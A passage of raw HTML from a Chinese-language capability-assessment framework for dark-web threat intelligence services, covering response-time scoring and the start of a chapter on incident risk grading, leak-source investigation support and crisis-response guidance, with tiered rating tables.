collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数据库响应速度</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">输入-全部响应完成 &gt; 15秒</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">输入-全部响应完成 &lt; 15秒</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">输入-全部响应完成 &lt; 5秒</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">响应效率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化指令输入至全量结果返回的耗时，可客观反映主体在海量数据处理与高性能查询方面的实际能力，为保障情报研判实时性与威胁处置高效率提供关键支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第九章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">事件处置与响应闭环能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">事件处置与响应闭环是暗网情报从</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁发现</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">向</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">风险消除</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">转化的最终落地环节，贯穿事件研判、溯源调查、危机应对、合规报送全流程，是实现暗网威胁</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">早发现、早研判、早处置、早闭环</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的核心保障。该能力以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实性核验、全链条溯源、全流程指导、风险压降</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为核心目标，面向各类暗网数据泄露与威胁通告提供标准化处置路径，直接决定威胁治理的最终成效与影响控制水平。本章立足暗网威胁事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">突发性、隐蔽性、扩散性、合规性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等核心特征，从暗网事件风险等级研判、协助泄露源调查、危机应对指导三个维度，构建事件处置与响应闭环能力量化评估体系，用以全面衡量威胁研判精准度、调查支撑力度与危机应对专业度，为暗网威胁事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">全流程闭环治理、合规化处置、风险最小化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供可量化、可落地的能力标尺。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">9.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">暗网事件风险等级研判</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网事件风险等级研判是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">事件处置与响应闭环能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心基础性指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对暗网泄露事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实性判定、新旧程度区分、威胁轨迹追溯、风险综合定级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能力开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁事件具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">来源混杂、真伪难辨、历史跨度大、影响范围广</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等特征，若缺乏系统化研判机制与历史数据支撑，将无法准确判定事件危害等级与扩散态势，难以形成科学处置优先级，进而延误响应时机、扩大风险危害。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察事件</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实性核验能力、历史轨迹追溯时长、全维度研判完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定威胁事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">判定精准度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">处置优先级合理性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为全域风险管控与应急响应提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">可靠、权威、可落地</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的研判依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合暗网威胁事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">隐蔽性、扩散性、溯源难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与实战化处置需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网数据泄露事件普遍存在重复发布、旧闻新发、部分伪造、分段泄露等现象，单一时间点信息无法完整反映事件真实状态。长期历史数据积累与跨威胁源关联追溯，是区分</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">新发事件与历史事件、真实泄露与虚假通告、完整泄露与片段泄露</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的关键依据。追溯时长越长、覆盖维度越全，研判结论可信度越高。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以事件</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实性研判能力、威胁轨迹完整性、历史追溯时长</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定科学合理的分级阈值，确保指标可客观反映主体在暗网事件风险定级与深度研判维度的实际能力水平。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网事件风险等级研判以事件</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">研判完整性、真实性核验能力、历史轨迹追溯时长</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网事件风险等级研判</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅可进行部分暗网泄露事件真实性、新旧等维度研判，无历史积累用于研判</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">可对任意暗网泄露事件进行真实性、新旧等维度研判，暗网轨迹追溯时间 &gt; 1年</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">可对任意暗网泄露事件进行真实性、新旧等维度研判，可输出事件全部暗网轨迹，追溯时间 &gt; 3年</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对暗网泄露事件的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实性判定、风险定级、全轨迹追溯</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能力。通过量化追溯时长与研判完整性，可客观反映主体在威胁事件深度分析与风险评估方面的实战水平，为应急处置、优先级排序与风险压降提供关键支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">9.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">协助泄露源调查</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">协助泄露源调查是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">事件处置与响应闭环能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的关键实操指标。本指标核心设计目的，在于评定针对泄露事件源头排查、链路溯源工作的全程支撑效能，规避实操环节各类合规风险与违规操作行为。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网相关溯源场景存在大量高风险实操环节，涉资金往来、匿名访问、私密社群准入、违规数据获取等行为均存在合规隐患。若相关支撑力度不足，易导致落地排查流程中必须介入高危操作，放大整体风险边界。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点核验溯源支撑环节对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">违规操作的规避能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，直接决定排查工作的合规安全性与落地可行性，为泄露源头清查与链路研判提供合规化实操依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合泄露溯源场景的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">合规红线、实操风险、业务支撑边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">综合确立。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">泄露溯源的作业环境全程处于暗网生态</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该场景匿名性强、风险触点密集、法律边界模糊，且溯源本身存在极大不确定性，最终成功率受多方客观因素影响，技术层面无法做到绝对保障。因此开展所有溯源工作，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">首要核心绝非追求溯源结果，而是全程优先保障用户人身安全与操作合规</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">常规溯源动作中，涉及私下谈判转账、搭建匿名链路、入驻黑客社群、下载敏感泄露数据等行为，均触碰高风险红线；一旦由用户自主操作，极易引发安全隐患与合规风险。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">故此本指标评判暗网情报支撑能力，核心标准聚焦一点：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">能否依托自有能力隔绝高危操作，让用户全程零触碰、零风险参与溯源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。以此划定分级梯度，客观体现不同服务层级下，对用户安全与合规的兜底保障能力。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">协助泄露源调查以溯源工作中</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">违规操作的全流程替代支撑能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">协助泄露源调查</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">对用户不提供实操类调查支撑，仅可输出理论咨询内容</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">可协助用户完成部分调查工作，剩余环节需用户自主推进，完整排查流程无法完全规避违规操作</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">可协助用户完成生态级全链条调查，全程用户无需开展支付、谈判、匿名访问、圈层注册、匿名介质使用、原始数据获取等各类违规操作</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评定泄露源头调查工作的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">合规支撑能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实操替代水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过明确违规操作的规避边界，可客观界定溯源支撑的安全层级，为泄露事件合规化排查、风险溯源及闭环处置提供标准化判定依据。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">9.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">危机应对指导</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">9.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">危机应对指导是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">事件处置与响应闭环能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要组成部分</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于评估</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">针对暗网事件输出全流程合规应对支撑的专业能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: 